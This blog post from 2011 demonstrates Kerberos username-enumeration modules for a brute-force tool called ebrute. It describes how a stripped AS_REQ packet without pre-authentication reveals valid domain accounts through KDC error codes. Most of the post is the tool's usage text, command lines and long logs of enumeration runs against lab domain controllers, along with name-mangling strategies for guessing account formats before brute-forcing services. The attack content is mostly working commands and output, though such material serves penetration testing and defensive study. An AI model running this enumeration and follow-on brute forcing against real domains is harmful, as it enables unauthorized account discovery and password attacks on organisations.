Tuesday, 6 December 2011


Kerberos Username Validation and Authentication Modules
I thought I would finally do a quick post about my kerberos enumeration and authentication modules for ebrute. I stumbled across this a few years ago when researching windows authentication mechanisms. A bit of tweaking allowed for the validation of a user account to be performed without a password guess via a single packet. Eventually I coded it into a usable plugin for ebrute. If you find yourself on a locked down network where you can't enumerate users via null shares or RID cycling this might just give you a nice starting point. It is best run it over UDP  (upto millions of validations per minute) but a TCP validation module is also included. If it is not working try kerbenumtcp rather than kerbenum as shown in the examples below.

In brief, Windows uses kerberos extensively to allow communication over a non-secure network to prove identities in a secure manner. The simple attack included in ebrute can be used to validate user accounts on w2k/2k3/2k8 Domain Controllers. The approach taken was:
  • Take a standard AS_REQ
  • Remove the PA_ENC_TIMESTAMP (saves 98 bytes + and a password guess.)
  • Remove any unnecessary encryption types (saves  ~16 bytes)
  • Remove host fields (saves ~30 bytes)
  • Change the client name to the user
  • Change the realm to the domain we are querying
  • Send packet
  • Parse the exceptions
Understanding the exceptions:
  • Invalid domain = KDC_ERR_WRONG_REALM
  • Invalid user = KDC_ERR_C_PRINCIPAL_UNKNOWN
  • Valid user = KDC_ERR_PREAUTH_REQUIRED

Lets look at this in action:

C:\tools\dev\br>ebrute
ebrute v0.76 - Edward Torkington
Usage: ebrute.exe -r [plugin] [options] [-u user|-U userfile] [-p pass|-P passfile] [-h host/hostrange|-H hostfile]
  -u    Username (, separated)
  -U    File containing usernames
  -up   Username prefix
  -us   Username suffix
  -uml  Username min length
  -uxl  Username max length
  -p    Password (, separated)
  -P    File containing passwords
  -pp   Password prefix
  -ps   Password suffix
  -pml  Password min length
  -pxl  Password max length
  -h    Host or range (nmap style)
  -H    File containing hosts
  -s    Connect via SSL
  -pn   Port number if not default
  -c    File, colon separated 'login:pass' format, instead of -U/-P options
  -R    File, with restore information saved via F12
  -j    Joey check
  -n    Null/blank check
  -S    Shared passwords optimisation
  -t    Number of threads [1].
  -d    Check all passwords for each user (default removes user after success)
  -un   Always perform uniqueness checks (default <5000 items otherwise slow startup...)
  -df   Disable the user filter (ignores guest, support, kerberos, IIS accounts etc...)
  -a    Disable host connectivity checks
  -l    File to output log to
  -sr   Max retries for scanner to determine if the service is alive [3]
  -sr   Max timeout in ms for scanner to determine if the service is alive [500]
  -jp   Just print out the attempts to be made
  -v    Verbose
  -vv   Very Verbose
  -vvv  Very Very Verbose
  -e    Extra parameters to pass to plugin
  -de   Forced delay between tasks (ms)
  -r    plugin - see below
  -rr   view detailed plugin help


finger ftp kerbauth kerbenum kerbenumtcp ldap lw mssql
mssqlodbc mssqlole mssqlmanaged mysql pop3 postgres process smbrawlmv2sh
smbrawlmv2mh smbrawntlmv2mh smbapilm smbapintlm smbapintlmv2 smtplogin smtpcram smtpntlm
smtpntlmbasic snmp ssh sshalt tcpfuzzerrandom tkpt tkptrandom tftp
udpfuzzerrandom vmware vnc wmi wwwbasic wwwdigest wwwntlm wwwntlmv2


  Keys during tasks
        v to increase debug level
        b to decrease debug level
        + to increase active threads
        - to decrease active threads
        p to pause/resume current job
        s to show authentication successes so far
        d to delete an IP address from the list
        F12 to save current progress, resume with parameter -R.
        Control + c to quit nicely (hold down to force!)


ERROR: No hosts specified.


C:\tools\dev\br>ebrute  -r kerbenum -P c:\tools\wl\std.txt -h 192.168.8.23 -e win2k3r2domain -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    28,881 user(s), 0 password(s), 1 host(s),  + joeycheck 28,881 tasks over 32 thread/s.
Starting: 06/12/2011 15:42:15
[5]  HOST: '192.168.8.23' | USER: 'abc' | PASS: 'abc' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[6]  HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'administrator' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[22]  HOST: '192.168.8.23' | USER: 'bob' | PASS: 'bob' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[11]  HOST: '192.168.8.23' | USER: 'guest' | PASS: 'guest' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[5]  HOST: '192.168.8.23' | USER: 'test1' | PASS: 'test1' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[15]  HOST: '192.168.8.23' | USER: 'test2' | PASS: 'test2' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[4]  HOST: '192.168.8.23' | USER: 'test' | PASS: 'test' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
Complete: 06/12/2011 15:42:23
Stats:    00:00:08    (~215,491 tasks/minute) (Performed 28,881 / 28,881 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.23' | USER: 'abc' | PASS: 'abc' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'administrator' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'bob' | PASS: 'bob' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'guest' | PASS: 'guest' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test1' | PASS: 'test1' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test2' | PASS: 'test2' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test' | PASS: 'test' | EXTRA: 'win2k3r2domain' | Return code: 'Success'




We can see that the summary of authentication successes gives us 7 user accounts to play with. Whilst the user and pass is printed this is only user validation at this point. We can now use a whole host of tools (including ebrute) to perform a brute force of any services that use these accounts. Further enumeration tricks can be done, for example:
  • Fast enough to do a-z (1,4 in length sometimes even 5)
  • Prefixing admin,adm,admin-,adm-,svc onto account names
  • Performing brute forcing of common names in different formats to guess the user account pattern
Typically, this methodology leads to around 70% of domain accounts being discovered. The first can be performed easily by supplying a dictionary of a-z permutations. The second can be performed easily through ebrute with the password prefix option -pp. An example against a different windows 2008 domain is shown below:

C:\tools\dev\br>ebrute -r kerbenum -e w2k8r00t -P c:\tools\wl\main.txt -pp svc- -h 192.168.8.88 -t 16
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    7,921,039 user(s), 0 password(s), 1 host(s),  + joeycheck 7,921,039 tasks over 16 thread/s.
Starting: 06/12/2011 21:42:36
Tasks remaining: 7,915,604    (Performance: ~161,820 tasks/minute, 50 minutes remain)
[2]  HOST: '192.168.8.88' | USER: 'svc-1luvial' | PASS: 'svc-1luvial' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (At
tempt 1/5)]
[1]  HOST: '192.168.8.88' | USER: 'svc-1luvia1' | PASS: 'svc-1luvia1' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (At
tempt 1/5)]
[11]  HOST: '192.168.8.88' | USER: 'svc-49-57584' | PASS: 'svc-49-57584' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads
(Attempt 1/5)]
Tasks remaining: 7,595,408    (Performance: ~355,773 tasks/minute, 22 minutes remain)
[14]  HOST: '192.168.8.88' | USER: 'svc-UREN1' | PASS: 'svc-UREN1' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (Attem
pt 1/5)]
Tasks remaining: 7,235,127    (Performance: ~360,281 tasks/minute, 21 minutes remain)
[8]  HOST: '192.168.8.88' | USER: 'svc-ade1antamiento' | PASS: 'svc-ade1antamiento' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly redu
ce threads (Attempt 1/5)]
Tasks remaining: 6,875,006    (Performance: ~360,121 tasks/minute, 20 minutes remain)
Tasks remaining: 6,511,282    (Performance: ~363,724 tasks/minute, 19 minutes remain)
Tasks remaining: 6,144,904    (Performance: ~366,378 tasks/minute, 18 minutes remain)
Tasks remaining: 5,785,394    (Performance: ~359,510 tasks/minute, 17 minutes remain)
Tasks remaining: 5,428,181    (Performance: ~357,213 tasks/minute, 16 minutes remain)
Tasks remaining: 5,067,123    (Performance: ~361,058 tasks/minute, 15 minutes remain)
Tasks remaining: 4,718,858    (Performance: ~360,274 tasks/minute, 14 minutes remain)
Tasks remaining: 4,352,219    (Performance: ~366,639 tasks/minute, 13 minutes remain)
[12]  HOST: '192.168.8.88' | USER: 'svc-konflikterend' | PASS: 'svc-konflikterend' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduc
e threads (Attempt 1/5)]
[10]  HOST: '192.168.8.88' | USER: 'svc-konflikterende' | PASS: 'svc-konflikterende' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly red
uce threads (Attempt 1/5)]
Tasks remaining: 3,997,140    (Performance: ~361,097 tasks/minute, 12 minutes remain)
Tasks remaining: 3,634,897    (Performance: ~362,243 tasks/minute, 11 minutes remain)
[5]  HOST: '192.168.8.88' | USER: 'svc-mssql' | PASS: 'svc-mssql' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Tasks remaining: 3,266,697    (Performance: ~368,200 tasks/minute, 10 minutes remain)
Tasks remaining: 2,902,300    (Performance: ~364,397 tasks/minute, 9 minutes remain)
Tasks remaining: 2,540,417    (Performance: ~361,883 tasks/minute, 8 minutes remain)
[1]  HOST: '192.168.8.88' | USER: 'svc-r0ckhair' | PASS: 'svc-r0ckhair' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (
Attempt 1/5)]
[16]  HOST: '192.168.8.88' | USER: 'svc-r0ckham' | PASS: 'svc-r0ckham' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (A
ttempt 1/5)]
[4]  HOST: '192.168.8.88' | USER: 'svc-r0ckham'z' | PASS: 'svc-r0ckham'z' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads
 (Attempt 1/5)]
[13]  HOST: '192.168.8.88' | USER: 'svc-r0ckh@m'$' | PASS: 'svc-r0ckh@m'$' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce thread
s (Attempt 1/5)]
Tasks remaining: 2,180,575    (Performance: ~359,842 tasks/minute, 7 minutes remain)
Tasks remaining: 1,820,347    (Performance: ~360,228 tasks/minute, 6 minutes remain)
Tasks remaining: 1,458,620    (Performance: ~361,727 tasks/minute, 5 minutes remain)
Tasks remaining: 1,097,220    (Performance: ~361,400 tasks/minute, 4 minutes remain)
Tasks remaining: 737,893    (Performance: ~359,327 tasks/minute, 3 minutes remain)
Tasks remaining: 376,757    (Performance: ~361,136 tasks/minute, 2 minutes remain)
[3]  HOST: '192.168.8.88' | USER: 'svc-ycnangup' | PASS: 'svc-ycnangup' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (
Attempt 1/5)]
Tasks remaining: 14,947    (Performance: ~361,810 tasks/minute, 1 minutes remain)
Complete: 06/12/2011 22:04:14
Stats:    00:21:37    (~366,186 tasks/minute) (Performed 7,921,039 / 7,921,039 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.88' | USER: 'svc-mssql' | PASS: 'svc-mssql' | EXTRA: 'w2k8r00t' | Return code: 'Success'

The last can also be performed with a custom dictionary to find out the format. Another tool (which I'll stick on here shortly) helps generate these dictionaries. The dictionary shown below takes the top ~100 common names from the US census and mangles them as follows:
  • FirstnameSurname
  • Firstname.Surname
  • SurnameFirstname
  • Surname.Firstname
  • Firstname_Surname
  • Surname_Firstname
  • Firstname-Surname
  • Surname-Firstname
Truncations are then performed on each of the firstnames and surnames (e.g. joh.smith,jo.smith and j.smith) to give a dictionary of ~140000 names. An example of this technique is shown below:


C:\tools\dev\br>ebrute -r kerbenum -e w2k8r00t -P c:\tools\wl\top_names.txt -h 192.168.8.88 -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    139,040 user(s), 0 password(s), 1 host(s),  + joeycheck 139,040 tasks over 32 thread/s.
Starting: 06/12/2011 22:07:22
[28]  HOST: '192.168.8.88' | USER: 'smith.john' | PASS: 'smith.john' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'kelly.michael' | PASS: 'kelly.michael' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Complete: 06/12/2011 22:07:44
Stats:    00:00:22    (~378,301 tasks/minute) (Performed 139,040 / 139,040 tasks)

Summary of Authentication Successes:
HOST: '192.168.8.88' | USER: 'smith.john' | PASS: 'smith.john' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'kelly.michael' | PASS: 'kelly.michael' | EXTRA: 'w2k8r00t' | Return code: 'Success'

A full dictionary could then be generated and supplied to ebrute, see below:

C:\tools\dev\br>ebrute -r kerbenum -e w2k8r00t -P c:\tools\wl\surname10000.firstname250.txt -h 192.168.8.88 -t 32
ebrute v0.76 - Edward Torkington
Running without admin privileges - warning some SMB plugins are disabled!
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    2,500,000 user(s), 0 password(s), 1 host(s),  + joeycheck 2,500,000 tasks over 32 thread/s.
Starting: 07/12/2011 11:21:31
[13]  HOST: '192.168.8.88' | USER: 'SMITH.RONNIE' | PASS: 'SMITH.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[24]  HOST: '192.168.8.88' | USER: 'JOHNSON.PHILIP' | PASS: 'JOHNSON.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[29]  HOST: '192.168.8.88' | USER: 'WILLIAMS.HUGH' | PASS: 'WILLIAMS.HUGH' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[25]  HOST: '192.168.8.88' | USER: 'BROWN.STEVEN' | PASS: 'BROWN.STEVEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[13]  HOST: '192.168.8.88' | USER: 'BROWN.DANIEL' | PASS: 'BROWN.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'JONES.JAIME' | PASS: 'JONES.JAIME' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[16]  HOST: '192.168.8.88' | USER: 'JONES.KEN' | PASS: 'JONES.KEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[31]  HOST: '192.168.8.88' | USER: 'JONES.BOB' | PASS: 'JONES.BOB' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[27]  HOST: '192.168.8.88' | USER: 'MILLER.PHILIP' | PASS: 'MILLER.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'GARCIA.KEVIN' | PASS: 'GARCIA.KEVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'WILSON.JOHN' | PASS: 'WILSON.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'WILSON.ROBERT' | PASS: 'WILSON.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[20]  HOST: '192.168.8.88' | USER: 'ANDERSON.GARY' | PASS: 'ANDERSON.GARY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'ANDERSON.TIMOTHY' | PASS: 'ANDERSON.TIMOTHY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'ANDERSON.DEAN' | PASS: 'ANDERSON.DEAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[5]  HOST: '192.168.8.88' | USER: 'LEE.HENRY' | PASS: 'LEE.HENRY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[8]  HOST: '192.168.8.88' | USER: 'CLARK.TONY' | PASS: 'CLARK.TONY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'CLARK.BRYAN' | PASS: 'CLARK.BRYAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[31]  HOST: '192.168.8.88' | USER: 'ALLEN.RON' | PASS: 'ALLEN.RON' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[18]  HOST: '192.168.8.88' | USER: 'SCOTT.JOHN' | PASS: 'SCOTT.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[6]  HOST: '192.168.8.88' | USER: 'SCOTT.ROBERT' | PASS: 'SCOTT.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[15]  HOST: '192.168.8.88' | USER: 'SCOTT.MICHAEL' | PASS: 'SCOTT.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'ADAMS.BYRON' | PASS: 'ADAMS.BYRON' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[29]  HOST: '192.168.8.88' | USER: 'ADAMS.JULIAN' | PASS: 'ADAMS.JULIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[13]  HOST: '192.168.8.88' | USER: 'HILL.STUART' | PASS: 'HILL.STUART' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'HILL.AUSTIN' | PASS: 'HILL.AUSTIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[26]  HOST: '192.168.8.88' | USER: 'MITCHELL.TODD' | PASS: 'MITCHELL.TODD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[20]  HOST: '192.168.8.88' | USER: 'EVANS.JOHNNY' | PASS: 'EVANS.JOHNNY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'TURNER.ERIC' | PASS: 'TURNER.ERIC' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[23]  HOST: '192.168.8.88' | USER: 'TURNER.SCOTT' | PASS: 'TURNER.SCOTT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[30]  HOST: '192.168.8.88' | USER: 'TURNER.RICKY' | PASS: 'TURNER.RICKY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'EDWARDS.HOWARD' | PASS: 'EDWARDS.HOWARD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[28]  HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[15]  HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[21]  HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[29]  HOST: '192.168.8.88' | USER: 'BAILEY.FRANCIS' | PASS: 'BAILEY.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[30]  HOST: '192.168.8.88' | USER: 'KELLY.MICHAEL' | PASS: 'KELLY.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'DIAZ.RICARDO' | PASS: 'DIAZ.RICARDO' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'WOOD.JIM' | PASS: 'WOOD.JIM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[21]  HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[18]  HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'BENNETT.DARYL' | PASS: 'BENNETT.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[8]  HOST: '192.168.8.88' | USER: 'BENNETT.JEFF' | PASS: 'BENNETT.JEFF' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'GRAY.NORMAN' | PASS: 'GRAY.NORMAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[11]  HOST: '192.168.8.88' | USER: 'ORTIZ.JOHNNIE' | PASS: 'ORTIZ.JOHNNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'HENDERSON.CHAD' | PASS: 'HENDERSON.CHAD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[20]  HOST: '192.168.8.88' | USER: 'KIM.DARYL' | PASS: 'KIM.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[6]  HOST: '192.168.8.88' | USER: 'FORD.ROSS' | PASS: 'FORD.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[21]  HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[3]  HOST: '192.168.8.88' | USER: 'SMITH.ROBERT' | PASS: 'SMITH.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads
Attempt 1/5)]
[2]  HOST: '192.168.8.88' | USER: 'SMITH.MICHAEL' | PASS: 'SMITH.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce thread
 (Attempt 1/5)]
[4]  HOST: '192.168.8.88' | USER: 'SMITH.JOHN' | PASS: 'SMITH.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (Att
mpt 1/5)]
[1]  HOST: '192.168.8.88' | USER: 'SMITH.JAMES' | PASS: 'SMITH.JAMES' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (A
tempt 1/5)]
[18]  HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[28]  HOST: '192.168.8.88' | USER: 'CRAWFORD.KENT' | PASS: 'CRAWFORD.KENT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'HUNTER.TROY' | PASS: 'HUNTER.TROY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[5]  HOST: '192.168.8.88' | USER: 'HOLMES.FREDDIE' | PASS: 'HOLMES.FREDDIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'SMITH.JOHN' | PASS: 'SMITH.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'ROSE.MARCUS' | PASS: 'ROSE.MARCUS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[18]  HOST: '192.168.8.88' | USER: 'MEDINA.JACKIE' | PASS: 'MEDINA.JACKIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[5]  HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'CUNNINGHAM.RONNIE' | PASS: 'CUNNINGHAM.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[3]  HOST: '192.168.8.88' | USER: 'ANDREWS.ROBERT' | PASS: 'ANDREWS.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'ANDREWS.MICHAEL' | PASS: 'ANDREWS.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[23]  HOST: '192.168.8.88' | USER: 'ANDREWS.DAVID' | PASS: 'ANDREWS.DAVID' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[5]  HOST: '192.168.8.88' | USER: 'ANDREWS.WILLIAM' | PASS: 'ANDREWS.WILLIAM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'GREENE.PAUL' | PASS: 'GREENE.PAUL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'GREENE.DANIEL' | PASS: 'GREENE.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'LAWSON.ALVIN' | PASS: 'LAWSON.ALVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[11]  HOST: '192.168.8.88' | USER: 'LAWSON.TIM' | PASS: 'LAWSON.TIM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[31]  HOST: '192.168.8.88' | USER: 'GILBERT.MARK' | PASS: 'GILBERT.MARK' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'DEAN.GORDON' | PASS: 'DEAN.GORDON' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Tasks remaining: 2,437,365    (Performance: ~341,367 tasks/minute, 8 minutes remain)
[25]  HOST: '192.168.8.88' | USER: 'MCCOY.BRIAN' | PASS: 'MCCOY.BRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[28]  HOST: '192.168.8.88' | USER: 'STEELE.EDWIN' | PASS: 'STEELE.EDWIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'SIMON.FRED' | PASS: 'SIMON.FRED' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[2]  HOST: '192.168.8.88' | USER: 'HUBBARD.LUTHER' | PASS: 'HUBBARD.LUTHER' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Tasks remaining: 2,385,922    (Performance: ~342,953 tasks/minute, 8 minutes remain)
[16]  HOST: '192.168.8.88' | USER: 'FLYNN.ADRIAN' | PASS: 'FLYNN.ADRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[8]  HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'ALLISON.BRUCE' | PASS: 'ALLISON.BRUCE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'BRENNAN.TRACY' | PASS: 'BRENNAN.TRACY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'SHANNON.BEN' | PASS: 'SHANNON.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[24]  HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[11]  HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'VILLA.ROGER' | PASS: 'VILLA.ROGER' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[16]  HOST: '192.168.8.88' | USER: 'FARLEY.ROSS' | PASS: 'FARLEY.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[2]  HOST: '192.168.8.88' | USER: 'BARTLETT.ALAN' | PASS: 'BARTLETT.ALAN' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce thread
 (Attempt 1/5)]
Tasks remaining: 2,005,804    (Performance: ~380,118 tasks/minute, 6 minutes remain)
[14]  HOST: '192.168.8.88' | USER: 'LEARY.BEN' | PASS: 'LEARY.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
